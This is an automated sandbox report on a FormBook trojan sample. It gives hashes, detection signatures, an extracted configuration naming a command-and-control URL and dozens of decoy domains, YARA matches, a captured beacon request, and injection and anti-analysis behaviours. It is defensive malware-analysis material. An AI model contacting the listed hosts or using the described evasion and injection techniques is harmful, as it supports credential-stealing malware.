Windows Analysis Report s2rsXUiUn8

Overview

General Information

Sample Name: s2rsXUiUn8 (renamed file extension from none to exe)
Analysis ID: 452684
MD5: f5041ec4ce468a07ecbfd076bc0f879b
SHA1: bda8cea1ec8d1cea253fc661559cd84cee2195b9
SHA256: caff14d450514a35eac5ba34b3e74126360662d7c8fdf60a8008a0e3bb8ed0b3
Tags: exe, trojan

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
System process connects to network (likely due to code injection or exploit)
Yara detected FormBook
C2 URLs / IPs found in malware configuration
Injects a PE file into a foreign processes
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Modifies the prolog of user mode functions (user mode inline hooks)
Obfuscated command line found
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Sigma detected: Suspicious PowerShell Command Line
Tries to detect virtualization through RDTSC time measurements
Very long command line found
Writes to foreign memory regions
Antivirus or Machine Learning detection for unpacked file
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
PE file contains more sections than normal
PE file contains sections with non-standard names
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara signature match

Classification

AV Detection:

Found malware configuration
Source: 00000009.00000002.342630046.0000000003140000.00000040.00000001.sdmp Malware Configuration Extractor: FormBook {"C2 list": ["www.homekeycap.com/pjje/"], "decoy": ["itsa-lifestyle.com", "searchclemson.com", "valenciabusiness.online", "valengz.com", "matematika-ege.online", "freetreeapp.com", "izzyworldpros.com", "qualityhealthsupply.com", "bedrockmappingllc.com", "sistersexlesbian.party", "numerologistreading.com", "bearcreekcattlebeef.com", "trophiesandtributes.com", "rajuherbalandspicegarden.com", "code-nana.com", "sofiepersson.com", "opticalsupples-kw.com", "strawberrylinebikehire.com", "29thplace.com", "oliviabegard.com", "hybridvenues.net", "huo-fo.com", "classicfirearmsny.com", "jlxrcm.com", "910portablestorage.com", "jewelryengravings.com", "loudsink.com", "collabasia.xyz", "northeastkitchenandbath.com", "bodrumdanakliyat.net", "raimirajkumararajah.com", "adultfeedrates.com", "compare-apr-rates.com", "ncdcnow.com", "huashi999.com", "swaplenders.com", "mission-duplex.com", "twenty-four-sevens.com", "growth-gmbh.com", "flying-agent.com", "luatsutruongquochoe.com", "thejewelcartel.com", "virtualbruins.com", "binhminhxanh.online", "wnz.xyz", "polishwithhart.com", "wecameforthis.com", "iti-gov.com", "a2zautoleasing.com", "akhisarozbirotohaliyikama.xyz", "tirupatipackersmovers.com", "virtualtheaterlive.com", "coronavirusfarmer.com", "crysdue.com", "cloolloy.com", "rowynetworks.com", "rakennuspalveluporola.net", "myparadisegetaways.com", "funnelsamurais.com", "thechiropractor.vegas", "04att.com", "copyrightforsupport.com", "hannrise.com", "softmov.com"]}
Multi AV Scanner detection for submitted file
Source: s2rsXUiUn8.exe Metadefender: Detection: 17%
Source: s2rsXUiUn8.exe ReversingLabs: Detection: 57%
Yara detected FormBook
Source: Yara match File source: 9.2.calc.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.2.calc.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000009.00000002.342630046.0000000003140000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.341624374.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.342443102.0000000002F00000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000013.00000002.495738829.00000000026F0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000013.00000002.494603483.00000000001A0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000013.00000002.496106399.0000000002870000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000000.333088696.00000000070E4000.00000040.00000001.sdmp, type: MEMORY
Antivirus or Machine Learning detection for unpacked file
Source: 9.2.calc.exe.400000.0.unpack Avira: Label: TR/Crypt.ZPACK.Gen
Source: unknown HTTPS traffic detected: 162.159.134.233:443 -> 192.168.2.5:49711 version: TLS 1.2
Source: Binary string: calc.pdbGCTL source: help.exe, 00000013.00000002.497718223.0000000002F8F000.00000004.00000001.sdmp
Source: Binary string: wscui.pdbUGP source: explorer.exe, 0000000A.00000000.298383788.0000000007180000.00000002.00000001.sdmp
Source: Binary string: wntdll.pdbUGP source: calc.exe, 00000009.00000002.342996454.000000000349F000.00000040.00000001.sdmp, help.exe, 00000013.00000002.497203365.0000000002B7F000.00000040.00000001.sdmp
Source: Binary string: calc.pdb source: help.exe, 00000013.00000002.497718223.0000000002F8F000.00000004.00000001.sdmp
Source: Binary string: wntdll.pdb source: calc.exe, help.exe
Source: Binary string: help.pdbGCTL source: calc.exe, 00000009.00000002.342338201.0000000002DD0000.00000040.00000001.sdmp
Source: Binary string: help.pdb source: calc.exe, 00000009.00000002.342338201.0000000002DD0000.00000040.00000001.sdmp
Source: Binary string: wscui.pdb source: explorer.exe, 0000000A.00000000.298383788.0000000007180000.00000002.00000001.sdmp

Software Vulnerabilities:

Found inlined nop instructions (likely shell or obfuscated code)
Source: C:\Windows\SysWOW64\calc.exe Code function: 4x nop then pop ebx 9_2_00407AFA
Source: C:\Windows\SysWOW64\calc.exe Code function: 4x nop then pop edi 9_2_0040E43F
Source: C:\Windows\SysWOW64\help.exe Code function: 4x nop then pop ebx 19_2_001A7AFB
Source: C:\Windows\SysWOW64\help.exe Code function: 4x nop then pop edi 19_2_001AE43F

Networking:

C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor URLs: www.homekeycap.com/pjje/
HTTP GET or POST without a user agent
Source: global traffic HTTP traffic detected: GET /pjje/?bxl0d=DltNRLknYIPOXZZpswXifEZmZKsLvkDXv3EaEi+D7UBg3hXwO76Ip4IkAw1khMTnG44t&r48tw=4hF0dRLhcH HTTP/1.1
Host: www.rajuherbalandspicegarden.com
Connection: close
Data Raw: 00 00 00 00 00 00 00
Data Ascii:
IP address seen in connection with other malware
Source: Joe Sandbox View IP Address: 162.159.134.233
Internet Provider seen in connection with other malware
Source: Joe Sandbox View ASN Name: UNIFIEDLAYER-AS-1US
JA3 SSL client fingerprint seen in connection with other malware
Source: Joe Sandbox View JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
Source: unknown DNS traffic detected: queries for: google.com
Source: explorer.exe, 0000000A.00000000.307113178.000000000BC36000.00000002.00000001.sdmp String found in binary or memory: http://fontfabrik.com
Source: explorer.exe, 0000000A.00000000.307113178.000000000BC36000.00000002.00000001.sdmp String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: explorer.exe, 0000000A.00000000.307113178.000000000BC36000.00000002.00000001.sdmp String found in binary or memory: http://www.carterandcone.coml
Source: explorer.exe, 0000000A.00000000.307113178.000000000BC36000.00000002.00000001.sdmp String found in binary or memory: http://www.fontbureau.com
Source: explorer.exe, 0000000A.00000000.307113178.000000000BC36000.00000002.00000001.sdmp String found in binary or memory: http://www.fontbureau.com/designers
Source: explorer.exe, 0000000A.00000000.307113178.000000000BC36000.00000002.00000001.sdmp String found in binary or memory: http://www.fontbureau.com/designers/?
Source: explorer.exe, 0000000A.00000000.307113178.000000000BC36000.00000002.00000001.sdmp String found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
Source: explorer.exe, 0000000A.00000000.307113178.000000000BC36000.00000002.00000001.sdmp String found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
Source: explorer.exe, 0000000A.00000000.307113178.000000000BC36000.00000002.00000001.sdmp String found in binary or memory: http://www.fontbureau.com/designers8
Source: explorer.exe, 0000000A.00000000.307113178.000000000BC36000.00000002.00000001.sdmp String found in binary or memory: http://www.fontbureau.com/designers?
Source: explorer.exe, 0000000A.00000000.307113178.000000000BC36000.00000002.00000001.sdmp String found in binary or memory: http://www.fontbureau.com/designersG
Source: explorer.exe, 0000000A.00000000.307113178.000000000BC36000.00000002.00000001.sdmp String found in binary or memory: http://www.fonts.com
Source: explorer.exe, 0000000A.00000000.307113178.000000000BC36000.00000002.00000001.sdmp String found in binary or memory: http://www.founder.com.cn/cn
Source: explorer.exe, 0000000A.00000000.307113178.000000000BC36000.00000002.00000001.sdmp String found in binary or memory: http://www.founder.com.cn/cn/bThe
Source: explorer.exe, 0000000A.00000000.307113178.000000000BC36000.00000002.00000001.sdmp String found in binary or memory: http://www.founder.com.cn/cn/cThe
Source: explorer.exe, 0000000A.00000000.307113178.000000000BC36000.00000002.00000001.sdmp String found in binary or memory: http://www.galapagosdesign.com/DPlease
Source: explorer.exe, 0000000A.00000000.307113178.000000000BC36000.00000002.00000001.sdmp String found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
Source: explorer.exe, 0000000A.00000000.307113178.000000000BC36000.00000002.00000001.sdmp String found in binary or memory: http://www.goodfont.co.kr
Source: explorer.exe, 0000000A.00000000.307113178.000000000BC36000.00000002.00000001.sdmp String found in binary or memory: http://www.jiyu-kobo.co.jp/
Source: explorer.exe, 0000000A.00000000.307113178.000000000BC36000.00000002.00000001.sdmp String found in binary or memory: http://www.sajatypeworks.com
Source: explorer.exe, 0000000A.00000000.307113178.000000000BC36000.00000002.00000001.sdmp String found in binary or memory: http://www.sakkal.com
Source: explorer.exe, 0000000A.00000000.307113178.000000000BC36000.00000002.00000001.sdmp String found in binary or memory: http://www.sandoll.co.kr
Source: explorer.exe, 0000000A.00000000.307113178.000000000BC36000.00000002.00000001.sdmp String found in binary or memory: http://www.tiro.com
Source: explorer.exe, 0000000A.00000000.307113178.000000000BC36000.00000002.00000001.sdmp String found in binary or memory: http://www.typography.netD
Source: explorer.exe, 0000000A.00000000.307113178.000000000BC36000.00000002.00000001.sdmp String found in binary or memory: http://www.urwpp.deDPlease
Source: explorer.exe, 0000000A.00000000.307113178.000000000BC36000.00000002.00000001.sdmp String found in binary or memory: http://www.zhongyicts.com.cn
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49711
Source: unknown Network traffic detected: HTTP traffic on port 49711 -> 443

E-Banking Fraud:

Yara detected FormBook
Source: Yara match File source: 9.2.calc.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.2.calc.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000009.00000002.342630046.0000000003140000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.341624374.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.342443102.0000000002F00000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000013.00000002.495738829.00000000026F0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000013.00000002.494603483.00000000001A0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000013.00000002.496106399.0000000002870000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000000.333088696.00000000070E4000.00000040.00000001.sdmp, type: MEMORY

System Summary:

Malicious sample detected (through community Yara rule)
Source: 9.2.calc.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 9.2.calc.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 9.2.calc.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 9.2.calc.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000009.00000002.342630046.0000000003140000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000009.00000002.342630046.0000000003140000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000009.00000002.341624374.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000009.00000002.341624374.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000009.00000002.342443102.0000000002F00000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000009.00000002.342443102.0000000002F00000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000013.00000002.495738829.00000000026F0000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000013.00000002.495738829.00000000026F0000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000013.00000002.494603483.00000000001A0000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000013.00000002.494603483.00000000001A0000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000013.00000002.496106399.0000000002870000.00000004.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000013.00000002.496106399.0000000002870000.00000004.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000000A.00000000.333088696.00000000070E4000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000A.00000000.333088696.00000000070E4000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Very long command line found
Source: C:\Users\user\Desktop\s2rsXUiUn8.exe Process created: Commandline size = 4201
Contains functionality to call native functions
Source: C:\Windows\SysWOW64\calc.exe Code function: 9_2_00419D50 NtCreateFile, 9_2_00419D50
Source: C:\Windows\SysWOW64\calc.exe Code function: 9_2_00419E00 NtReadFile, 9_2_00419E00
Source: C:\Windows\SysWOW64\calc.exe Code function: 9_2_00419E80 NtClose, 9_2_00419E80
Source: C:\Windows\SysWOW64\calc.exe Code function: 9_2_00419F30 NtAllocateVirtualMemory, 9_2_00419F30
Source: C:\Windows\SysWOW64\calc.exe Code function: 9_2_00419D4B NtCreateFile, 9_2_00419D4B
Source: C:\Windows\SysWOW64\calc.exe Code function: 9_2_00419DFB NtReadFile, 9_2_00419DFB
Source: C:\Windows\SysWOW64\calc.exe Code function: 9_2_00419E4A NtClose, 9_2_00419E4A
Source: C:\Windows\SysWOW64\calc.exe Code function: 9_2_00419E7A NtClose, 9_2_00419E7A
Source: C:\Windows\SysWOW64\calc.exe Code function: 9_2_033E9A20 NtResumeThread,LdrInitializeThunk, 9_2_033E9A20
Source: C:\Windows\SysWOW64\calc.exe Code function: 9_2_033E9A00 NtProtectVirtualMemory,LdrInitializeThunk, 9_2_033E9A00
Source: C:\Windows\SysWOW64\calc.exe Code function: 9_2_033E9A50 NtCreateFile,LdrInitializeThunk, 9_2_033E9A50
Source: C:\Windows\SysWOW64\calc.exe Code function: 9_2_033E9910 NtAdjustPrivilegesToken,LdrInitializeThunk, 9_2_033E9910
Source: C:\Windows\SysWOW64\calc.exe Code function: 9_2_033E99A0 NtCreateSection,LdrInitializeThunk, 9_2_033E99A0
Source: C:\Windows\SysWOW64\calc.exe Code function: 9_2_033E9860 NtQuerySystemInformation,LdrInitializeThunk, 9_2_033E9860
Source: C:\Windows\SysWOW64\calc.exe Code function: 9_2_033E9840 NtDelayExecution,LdrInitializeThunk, 9_2_033E9840
Source: C:\Windows\SysWOW64\calc.exe Code function: 9_2_033E98F0 NtReadVirtualMemory,LdrInitializeThunk, 9_2_033E98F0
Source: C:\Windows\SysWOW64\calc.exe Code function: 9_2_033E9710 NtQueryInformationToken,LdrInitializeThunk, 9_2_033E9710
Source: C:\Windows\SysWOW64\calc.exe Code function: 9_2_033E97A0 NtUnmapViewOfSection,LdrInitializeThunk, 9_2_033E97A0
Source: C:\Windows\SysWOW64\calc.exe Code function: 9_2_033E9780 NtMapViewOfSection,LdrInitializeThunk, 9_2_033E9780
Source: C:\Windows\SysWOW64\calc.exe Code function: 9_2_033E9660 NtAllocateVirtualMemory,LdrInitializeThunk, 9_2_033E9660
Source: C:\Windows\SysWOW64\calc.exe Code function: 9_2_033E96E0 NtFreeVirtualMemory,LdrInitializeThunk, 9_2_033E96E0
Source: C:\Windows\SysWOW64\calc.exe Code function: 9_2_033E9540 NtReadFile,LdrInitializeThunk, 9_2_033E9540
Source: C:\Windows\SysWOW64\calc.exe Code function: 9_2_033E95D0 NtClose,LdrInitializeThunk, 9_2_033E95D0
Source: C:\Windows\SysWOW64\calc.exe Code function: 9_2_033E9B00 NtSetValueKey, 9_2_033E9B00
Source: C:\Windows\SysWOW64\calc.exe Code function: 9_2_033EA3B0 NtGetContextThread, 9_2_033EA3B0
Source: C:\Windows\SysWOW64\calc.exe Code function: 9_2_033E9A10 NtQuerySection, 9_2_033E9A10
Source: C:\Windows\SysWOW64\calc.exe Code function: 9_2_033E9A80 NtOpenDirectoryObject, 9_2_033E9A80
Source: C:\Windows\SysWOW64\calc.exe Code function: 9_2_033E9950 NtQueueApcThread, 9_2_033E9950
Source: C:\Windows\SysWOW64\calc.exe Code function: 9_2_033E99D0 NtCreateProcessEx, 9_2_033E99D0
Source: C:\Windows\SysWOW64\calc.exe Code function: 9_2_033E9820 NtEnumerateKey, 9_2_033E9820
Source: C:\Windows\SysWOW64\calc.exe Code function: 9_2_033EB040 NtSuspendThread, 9_2_033EB040
Source: C:\Windows\SysWOW64\calc.exe Code function: 9_2_033E98A0 NtWriteVirtualMemory, 9_2_033E98A0
Source: C:\Windows\SysWOW64\calc.exe Code function: 9_2_033E9730 NtQueryVirtualMemory, 9_2_033E9730
Source: C:\Windows\SysWOW64\calc.exe Code function: 9_2_033EA710 NtOpenProcessToken, 9_2_033EA710
Source: C:\Windows\SysWOW64\calc.exe Code function: 9_2_033E9770 NtSetInformationFile, 9_2_033E9770
Source: C:\Windows\SysWOW64\calc.exe Code function: 9_2_033EA770 NtOpenThread, 9_2_033EA770
Source: C:\Windows\SysWOW64\calc.exe Code function: 9_2_033E9760 NtOpenProcess, 9_2_033E9760
Source: C:\Windows\SysWOW64\calc.exe Code function: 9_2_033E9FE0 NtCreateMutant, 9_2_033E9FE0
Source: C:\Windows\SysWOW64\calc.exe Code function: 9_2_033E9610 NtEnumerateValueKey, 9_2_033E9610
Source: C:\Windows\SysWOW64\calc.exe Code function: 9_2_033E9670 NtQueryInformationProcess, 9_2_033E9670
Source: C:\Windows\SysWOW64\calc.exe Code function: 9_2_033E9650 NtQueryValueKey, 9_2_033E9650
Source: C:\Windows\SysWOW64\calc.exe Code function: 9_2_033E96D0 NtCreateKey, 9_2_033E96D0
Source: C:\Windows\SysWOW64\calc.exe Code function: 9_2_033EAD30 NtSetContextThread, 9_2_033EAD30
Source: C:\Windows\SysWOW64\calc.exe Code function: 9_2_033E9520 NtWaitForSingleObject, 9_2_033E9520
Source: C:\Windows\SysWOW64\calc.exe Code function: 9_2_033E9560 NtWriteFile, 9_2_033E9560
Source: C:\Windows\SysWOW64\calc.exe Code function: 9_2_033E95F0 NtQueryInformationFile, 9_2_033E95F0
Source: C:\Windows\SysWOW64\help.exe Code function: 19_2_02AC96E0 NtFreeVirtualMemory,LdrInitializeThunk, 19_2_02AC96E0
Source: C:\Windows\SysWOW64\help.exe Code function: 19_2_02AC96D0 NtCreateKey,LdrInitializeThunk, 19_2_02AC96D0
Source: C:\Windows\SysWOW64\help.exe Code function: 19_2_02AC9660 NtAllocateVirtualMemory,LdrInitializeThunk, 19_2_02AC9660
Source: C:\Windows\SysWOW64\help.exe Code function: 19_2_02AC9650 NtQueryValueKey,LdrInitializeThunk, 19_2_02AC9650
Source: C:\Windows\SysWOW64\help.exe Code function: 19_2_02AC9A50 NtCreateFile,LdrInitializeThunk, 19_2_02AC9A50
Source: C:\Windows\SysWOW64\help.exe Code function: 19_2_02AC9780 NtMapViewOfSection,LdrInitializeThunk, 19_2_02AC9780
Source: C:\Windows\SysWOW64\help.exe Code function: 19_2_02AC9FE0 NtCreateMutant,LdrInitializeThunk, 19_2_02AC9FE0
Source: C:\Windows\SysWOW64\help.exe Code function: 19_2_02AC9710 NtQueryInformationToken,LdrInitializeThunk, 19_2_02AC9710
Source: C:\Windows\SysWOW64\help.exe Code function: 19_2_02AC9860 NtQuerySystemInformation,LdrInitializeThunk, 19_2_02AC9860
Source: C:\Windows\SysWOW64\help.exe Code function: 19_2_02AC9840 NtDelayExecution,LdrInitializeThunk, 19_2_02AC9840
Source: C:\Windows\SysWOW64\help.exe Code function: 19_2_02AC99A0 NtCreateSection,LdrInitializeThunk, 19_2_02AC99A0
Source: C:\Windows\SysWOW64\help.exe Code function: 19_2_02AC95D0 NtClose,LdrInitializeThunk, 19_2_02AC95D0
Source: C:\Windows\SysWOW64\help.exe Code function: 19_2_02AC9910 NtAdjustPrivilegesToken,LdrInitializeThunk, 19_2_02AC9910
Source: C:\Windows\SysWOW64\help.exe Code function: 19_2_02AC9540 NtReadFile,LdrInitializeThunk, 19_2_02AC9540
Source: C:\Windows\SysWOW64\help.exe Code function: 19_2_02AC9A80 NtOpenDirectoryObject, 19_2_02AC9A80
Source: C:\Windows\SysWOW64\help.exe Code function: 19_2_02AC9A20 NtResumeThread, 19_2_02AC9A20
Source: C:\Windows\SysWOW64\help.exe Code function: 19_2_02AC9A00 NtProtectVirtualMemory, 19_2_02AC9A00
Source: C:\Windows\SysWOW64\help.exe Code function: 19_2_02AC9610 NtEnumerateValueKey, 19_2_02AC9610
Source: C:\Windows\SysWOW64\help.exe Code function: 19_2_02AC9A10 NtQuerySection, 19_2_02AC9A10
Source: C:\Windows\SysWOW64\help.exe Code function: 19_2_02AC9670 NtQueryInformationProcess, 19_2_02AC9670
Source: C:\Windows\SysWOW64\help.exe Code function: 19_2_02AC97A0 NtUnmapViewOfSection, 19_2_02AC97A0
Source: C:\Windows\SysWOW64\help.exe Code function: 19_2_02ACA3B0 NtGetContextThread, 19_2_02ACA3B0
Source: C:\Windows\SysWOW64\help.exe Code function: 19_2_02AC9730 NtQueryVirtualMemory, 19_2_02AC9730
Source: C:\Windows\SysWOW64\help.exe Code function: 19_2_02AC9B00 NtSetValueKey, 19_2_02AC9B00
Source: C:\Windows\SysWOW64\help.exe Code function: 19_2_02ACA710 NtOpenProcessToken, 19_2_02ACA710
Source: C:\Windows\SysWOW64\help.exe Code function: 19_2_02AC9760 NtOpenProcess, 19_2_02AC9760
Source: C:\Windows\SysWOW64\help.exe Code function: 19_2_02AC9770 NtSetInformationFile, 19_2_02AC9770
Source: C:\Windows\SysWOW64\help.exe Code function: 19_2_02ACA770 NtOpenThread, 19_2_02ACA770
Source: C:\Windows\SysWOW64\help.exe Code function: 19_2_02AC98A0 NtWriteVirtualMemory, 19_2_02AC98A0
Source: C:\Windows\SysWOW64\help.exe Code function: 19_2_02AC98F0 NtReadVirtualMemory, 19_2_02AC98F0
Source: C:\Windows\SysWOW64\help.exe Code function: 19_2_02AC9820 NtEnumerateKey, 19_2_02AC9820
Source: C:\Windows\SysWOW64\help.exe Code function: 19_2_02ACB040 NtSuspendThread, 19_2_02ACB040
Source: C:\Windows\SysWOW64\help.exe Code function: 19_2_02AC95F0 NtQueryInformationFile, 19_2_02AC95F0
Source: C:\Windows\SysWOW64\help.exe Code function: 19_2_02AC99D0 NtCreateProcessEx, 19_2_02AC99D0
Source: C:\Windows\SysWOW64\help.exe Code function: 19_2_02AC9520 NtWaitForSingleObject, 19_2_02AC9520
Source: C:\Windows\SysWOW64\help.exe Code function: 19_2_02ACAD30 NtSetContextThread, 19_2_02ACAD30
Source: C:\Windows\SysWOW64\help.exe Code function: 19_2_02AC9560 NtWriteFile, 19_2_02AC9560
Source: C:\Windows\SysWOW64\help.exe Code function: 19_2_02AC9950 NtQueueApcThread, 19_2_02AC9950
Source: C:\Windows\SysWOW64\help.exe Code function: 19_2_001B9D50 NtCreateFile, 19_2_001B9D50
Source: C:\Windows\SysWOW64\help.exe Code function: 19_2_001B9E00 NtReadFile, 19_2_001B9E00
Source: C:\Windows\SysWOW64\help.exe Code function: 19_2_001B9E80 NtClose, 19_2_001B9E80
Source: C:\Windows\SysWOW64\help.exe Code function: 19_2_001B9F30 NtAllocateVirtualMemory, 19_2_001B9F30
Source: C:\Windows\SysWOW64\help.exe Code function: 19_2_001B9D4B NtCreateFile, 19_2_001B9D4B
Source: C:\Windows\SysWOW64\help.exe Code function: 19_2_001B9DFB NtReadFile, 19_2_001B9DFB
Source: C:\Windows\SysWOW64\help.exe Code function: 19_2_001B9E4A NtClose, 19_2_001B9E4A
Source: C:\Windows\SysWOW64\help.exe Code function: 19_2_001B9E7A NtClose, 19_2_001B9E7A
Detected potential crypto function
Source: C:\Windows\SysWOW64\calc.exe Code function: 9_2_0041D84E 9_2_0041D84E
Source: C:\Windows\SysWOW64\calc.exe Code function: 9_2_0041E066 9_2_0041E066
Source: C:\Windows\SysWOW64\calc.exe Code function: 9_2_00401030 9_2_00401030
Source: C:\Windows\SysWOW64\calc.exe Code function: 9_2_0041E94D 9_2_0041E94D
Source: C:\Windows\SysWOW64\calc.exe Code function: 9_2_0041D1F1 9_2_0041D1F1
Source: C:\Windows\SysWOW64\calc.exe Code function: 9_2_0041DA23 9_2_0041DA23
Source: C:\Windows\SysWOW64\calc.exe Code function: 9_2_0041DB36 9_2_0041DB36
Source: C:\Windows\SysWOW64\calc.exe Code function: 9_2_00402D89 9_2_00402D89
Source: C:\Windows\SysWOW64\calc.exe Code function: 9_2_00402D90 9_2_00402D90
Source: C:\Windows\SysWOW64\calc.exe Code function: 9_2_0041BE22 9_2_0041BE22
Source: C:\Windows\SysWOW64\calc.exe Code function: 9_2_00409E30 9_2_00409E30
Source: C:\Windows\SysWOW64\calc.exe Code function: 9_2_00402FB0 9_2_00402FB0
Source: C:\Windows\SysWOW64\calc.exe Code function: 9_2_03472B28 9_2_03472B28
Source: C:\Windows\SysWOW64\calc.exe Code function: 9_2_033DEBB0 9_2_033DEBB0
Source: C:\Windows\SysWOW64\calc.exe Code function: 9_2_034722AE 9_2_034722AE
Source: C:\Windows\SysWOW64\calc.exe Code function: 9_2_033C4120 9_2_033C4120
Source: C:\Windows\SysWOW64\calc.exe Code function: 9_2_033AF900 9_2_033AF900
Source: C:\Windows\SysWOW64\calc.exe Code function: 9_2_03461002 9_2_03461002
Source: C:\Windows\SysWOW64\calc.exe Code function: 9_2_033D20A0 9_2_033D20A0
Source: C:\Windows\SysWOW64\calc.exe Code function: 9_2_033BB090 9_2_033BB090
Source: C:\Windows\SysWOW64\calc.exe Code function: 9_2_034720A8 9_2_034720A8
Source: C:\Windows\SysWOW64\calc.exe Code function: 9_2_03471FF1 9_2_03471FF1
Source: C:\Windows\SysWOW64\calc.exe Code function: 9_2_033C6E30 9_2_033C6E30
Source: C:\Windows\SysWOW64\calc.exe Code function: 9_2_03472EF7 9_2_03472EF7
Source: C:\Windows\SysWOW64\calc.exe Code function: 9_2_03471D55 9_2_03471D55
Source: C:\Windows\SysWOW64\calc.exe Code function: 9_2_033A0D20 9_2_033A0D20
Source: C:\Windows\SysWOW64\calc.exe Code function: 9_2_03472D07 9_2_03472D07
Source: C:\Windows\SysWOW64\calc.exe Code function: 9_2_033D2581 9_2_033D2581
Source: C:\Windows\SysWOW64\calc.exe Code function: 9_2_033BD5E0 9_2_033BD5E0
Source: C:\Windows\SysWOW64\calc.exe Code function: 9_2_033B841F 9_2_033B841F
Source: C:\Windows\SysWOW64\help.exe Code function: 19_2_02AA6E30 19_2_02AA6E30
Source: C:\Windows\SysWOW64\help.exe Code function: 19_2_02ABEBB0 19_2_02ABEBB0
Source: C:\Windows\SysWOW64\help.exe Code function: 19_2_02A9B090 19_2_02A9B090
Source: C:\Windows\SysWOW64\help.exe Code function: 19_2_02B41002 19_2_02B41002
Source: C:\Windows\SysWOW64\help.exe Code function: 19_2_02A9841F 19_2_02A9841F
Source: C:\Windows\SysWOW64\help.exe Code function: 19_2_02A9D5E0 19_2_02A9D5E0
Source: C:\Windows\SysWOW64\help.exe Code function: 19_2_02A80D20 19_2_02A80D20
Source: C:\Windows\SysWOW64\help.exe Code function: 19_2_02AA4120 19_2_02AA4120
Source: C:\Windows\SysWOW64\help.exe Code function: 19_2_02A8F900 19_2_02A8F900
Source: C:\Windows\SysWOW64\help.exe Code function: 19_2_02B51D55 19_2_02B51D55
